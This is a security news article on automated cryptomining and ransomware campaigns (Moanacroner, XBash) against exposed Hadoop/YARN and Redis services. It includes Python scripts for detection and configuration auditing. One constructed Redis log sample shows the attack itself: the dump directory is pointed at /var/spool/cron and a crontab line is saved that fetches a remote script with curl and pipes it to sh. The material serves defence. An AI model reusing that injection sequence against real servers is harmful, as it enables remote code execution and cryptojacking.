Persistent Cloud Infrastructure/Hadoop/YARN Attacks via Moanacroner, XBash and Others



Securonix's threat research team has warned of a sustained rise in automated attacks against exposed cloud infrastructure, in particular Hadoop/YARN clusters, and has published guidance on detecting them with security analytics. The campaigns it describes range from multi-vector, multi-platform worms such as XBash to simpler single-vector miners such as Moanacroner.

The automated attacks target exposed cloud infrastructure/Hadoop/YARN instances. Moanacroner (a variant of Sustes) sits at the simple end of the range: a fairly trivial but fully targeted single-vector, single-platform attack focused mainly on cryptocurrency mining.

According to the researchers, the attackers' main goal is to install a second-stage payload for cryptomining and/or remote access. In some cases the malware also propagates to other exposed services, corrupts data, and installs second-stage cryptomining and ransomware payloads.

The attackers exploit unpatched vulnerabilities or exposed configurations in cloud services such as the Apache Hadoop processing toolset or Redis data stores; where a service is password-protected at all, weak credentials are found by brute force.

The key vectors in the attacks are unauthenticated command execution through Hadoop YARN's ResourceManager REST API and remote command execution on unauthenticated Redis instances; other vectors include the ActiveMQ fileserver arbitrary file write vulnerability (CVE-2016-3088).
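The two main vectors leave recognisable traces in the services' own logs, which is what the "security analytics" in the report title is about. The script below is an added example, not Securonix's detection content, and assumes two log formats: YARN ResourceManager audit-log lines in the tab-separated KEY=VALUE form written by RMAuditLogger, where REST submissions made without authentication are attributed to the static user dr.who (the default for hadoop.http.staticuser.user), and Redis activity in the line format emitted by the MONITOR command. The internal network ranges and both log excerpts are constructed for the example; the Redis excerpt shows the common unauthenticated-Redis persistence trick of redirecting the RDB dump into a cron directory and saving a crontab line as the dump file.

```python
"""Detection logic for anonymous YARN application submissions and for the
Redis CONFIG SET dir/dbfilename + SAVE file-write sequence.

Added example; log formats and network ranges are assumptions, sample
log lines are constructed.
"""
import ipaddress
import re
from collections import defaultdict

# Assumption: the cluster's own address space (RFC 1918 ranges).
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed RMAuditLogger excerpt: one Kerberos-authenticated submission,
# then an anonymous (dr.who) submission and a follow-up from an external IP.
YARN_AUDIT_LOG = """\
2019-01-14 10:02:11,301 INFO resourcemanager.RMAuditLogger: USER=etl@CORP.EXAMPLE\tIP=10.20.0.15\tOPERATION=Submit Application Request\tTARGET=ClientRMService\tRESULT=SUCCESS\tAPPID=application_1547460000000_0001
2019-01-14 10:05:42,118 INFO resourcemanager.RMAuditLogger: USER=dr.who\tIP=203.0.113.77\tOPERATION=Submit Application Request\tTARGET=ClientRMService\tRESULT=SUCCESS\tAPPID=application_1547460000000_0002
2019-01-14 10:05:43,002 INFO resourcemanager.RMAuditLogger: USER=dr.who\tIP=203.0.113.77\tOPERATION=Kill Application Request\tTARGET=ClientRMService\tRESULT=FAILURE\tAPPID=application_1547460000000_0002
"""

# Constructed MONITOR excerpt: normal traffic from an internal client, plus an
# external client that points the RDB dump at /var/spool/cron and saves it.
REDIS_MONITOR_LOG = """\
1547460342.118311 [0 10.20.0.15:40112] "GET" "session:8b1f"
1547460350.004120 [0 203.0.113.77:51234] "CONFIG" "SET" "dir" "/var/spool/cron"
1547460350.104511 [0 203.0.113.77:51234] "CONFIG" "SET" "dbfilename" "root"
1547460350.204923 [0 203.0.113.77:51234] "SET" "x" "\\n* * * * * curl -fsSL http://198.51.100.9/i.sh | sh\\n"
1547460350.305001 [0 203.0.113.77:51234] "SAVE"
1547460360.000000 [0 10.20.0.15:40112] "SET" "session:8b1f" "ok"
"""


def is_internal(ip):
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_audit_line(line):
    """Turn the tab-separated KEY=VALUE tail of an RMAuditLogger line into a dict."""
    _, _, tail = line.partition("RMAuditLogger: ")
    return dict(kv.split("=", 1) for kv in tail.strip().split("\t") if "=" in kv)


def yarn_anonymous_submissions(log_text):
    """Return (ip, appid, external) for every application submitted as dr.who.

    Any hit means the ResourceManager REST API accepted work without
    authentication; an external source address makes it an intrusion indicator.
    """
    hits = []
    for line in log_text.splitlines():
        if "RMAuditLogger" not in line:
            continue
        f = parse_audit_line(line)
        if (f.get("USER") == "dr.who"
                and f.get("OPERATION") == "Submit Application Request"
                and f.get("RESULT") == "SUCCESS"):
            ip = f.get("IP", "")
            hits.append((ip, f.get("APPID"), not is_internal(ip)))
    return hits


MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted MONITOR argument


def parse_monitor_line(line):
    """Return (client, [command, arg, ...]) for a MONITOR line, or None."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), ARG_RE.findall(m.group("args"))


def redis_file_write_sequences(monitor_text,
                               sensitive_dirs=("/var/spool/cron", "/etc/cron.d",
                                               "/root/.ssh", "/home")):
    """Per client, track CONFIG SET dir/dbfilename and report a (client, path)
    finding when SAVE or BGSAVE runs while the dump directory points somewhere
    that turns the RDB file into a crontab or an authorized_keys file."""
    state = defaultdict(dict)
    findings = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                state[client][key] = args[3]
        elif cmd in ("SAVE", "BGSAVE"):
            d = state[client].get("dir", "")
            if any(d.startswith(p) for p in sensitive_dirs):
                findings.append((client, d + "/" + state[client].get("dbfilename", "dump.rdb")))
    return findings


if __name__ == "__main__":
    print(yarn_anonymous_submissions(YARN_AUDIT_LOG))
    print(redis_file_write_sequences(REDIS_MONITOR_LOG))
```

The Redis detector keys its state per client connection, so an administrator's legitimate CONFIG SET dir from another session does not get blended with an attacker's SAVE; in production the same logic would be fed from the MONITOR stream or from a proxy log rather than from a string.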

The most common malware tool remains the XBash worm, first observed in May 2018, which infects both Windows and Linux servers and deploys additional payloads tailored to the operating system it lands on.

The Xbash botnet shows a distinctive combination of cryptojacking, cybersabotage, and multi-platform behaviour: the malware deletes databases, installs cryptojacking scripts, and acts as ransomware.

Many of the vulnerable services, Redis among them, were never designed to be reachable from the internet and ship without strong security controls by default.

Organisations running such services should apply stronger security to all cloud offerings, whether they are used for remote management, application data storage, or messaging. A security management programme for cloud assets is also needed, so that critical vulnerabilities and exposed configurations are found and remediated promptly.
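For the two services named in this article, "stronger security" mostly comes down to a handful of settings that the default configurations leave open. The audit script below is an added example, not part of the article or of either project; it assumes the stock redis.conf directive names and the Hadoop core-site.xml properties hadoop.security.authentication and hadoop.http.authentication.type (the latter governs the web UIs and REST APIs, which is exactly where the YARN vector lives). The weak and hardened configuration excerpts are constructed, and the hardened Hadoop excerpt is only the core-site part of a Kerberos rollout, not a complete one.

```python
"""Flag the settings that make a Redis or Hadoop instance an easy target.

Added example; directive and property names are the stock ones, the
configuration excerpts are constructed.
"""
import shlex
import xml.etree.ElementTree as ET

# Constructed: redis.conf as an exposed instance is typically found.
REDIS_CONF_WEAK = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
"""

# Constructed: the same instance hardened (password is a placeholder).
REDIS_CONF_HARDENED = """\
bind 127.0.0.1 10.20.0.5
protected-mode yes
port 6379
requirepass 3c6f1b0a9e2d4f7b8a1c5e9d0f2b4a6c
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
"""

# Constructed: core-site.xml with the default "simple" authentication.
CORE_SITE_WEAK = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn1:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>"""

# Constructed: core-site.xml with Kerberos for RPC and for the HTTP endpoints.
CORE_SITE_HARDENED = """<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://nn1:8020</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
</configuration>"""


def parse_redis_conf(text):
    """Map each directive to the argument lists seen for it; directives such
    as rename-command legitimately repeat, so every occurrence is kept."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)
        conf.setdefault(tokens[0].lower(), []).append(tokens[1:])
    return conf


def audit_redis_conf(text):
    """Return short finding codes for the weak settings present in a redis.conf."""
    conf = parse_redis_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no-requirepass")
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "*", "::", "::*") for b in binds):
        findings.append("bind-all-interfaces")
    pm = conf.get("protected-mode", [["yes"]])[0]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode-off")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        # CONFIG SET dir/dbfilename is what turns an open Redis into a file writer.
        findings.append("config-command-enabled")
    return findings


def parse_core_site(xml_text):
    """Return the <name> -> <value> map of a Hadoop *-site.xml document."""
    root = ET.fromstring(xml_text)
    return {p.findtext("name", "").strip(): p.findtext("value", "").strip()
            for p in root.iter("property")}


def audit_core_site(xml_text):
    """Return finding codes when RPC or HTTP access is not Kerberos-authenticated."""
    props = parse_core_site(xml_text)
    findings = []
    if props.get("hadoop.security.authentication", "simple").lower() != "kerberos":
        findings.append("simple-auth")
    if props.get("hadoop.http.authentication.type", "simple").lower() == "simple":
        findings.append("http-auth-simple")
    return findings


if __name__ == "__main__":
    print("redis weak:", audit_redis_conf(REDIS_CONF_WEAK))
    print("redis hardened:", audit_redis_conf(REDIS_CONF_HARDENED))
    print("hadoop weak:", audit_core_site(CORE_SITE_WEAK))
    print("hadoop hardened:", audit_core_site(CORE_SITE_HARDENED))
```

Binding Redis to specific addresses and requiring a password removes the unauthenticated vector outright; renaming CONFIG is defence in depth for the case where the password leaks or is brute-forced. On the Hadoop side the checks only confirm that the authentication switches are set; the firewall rule keeping port 8088 off the internet still has to exist.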
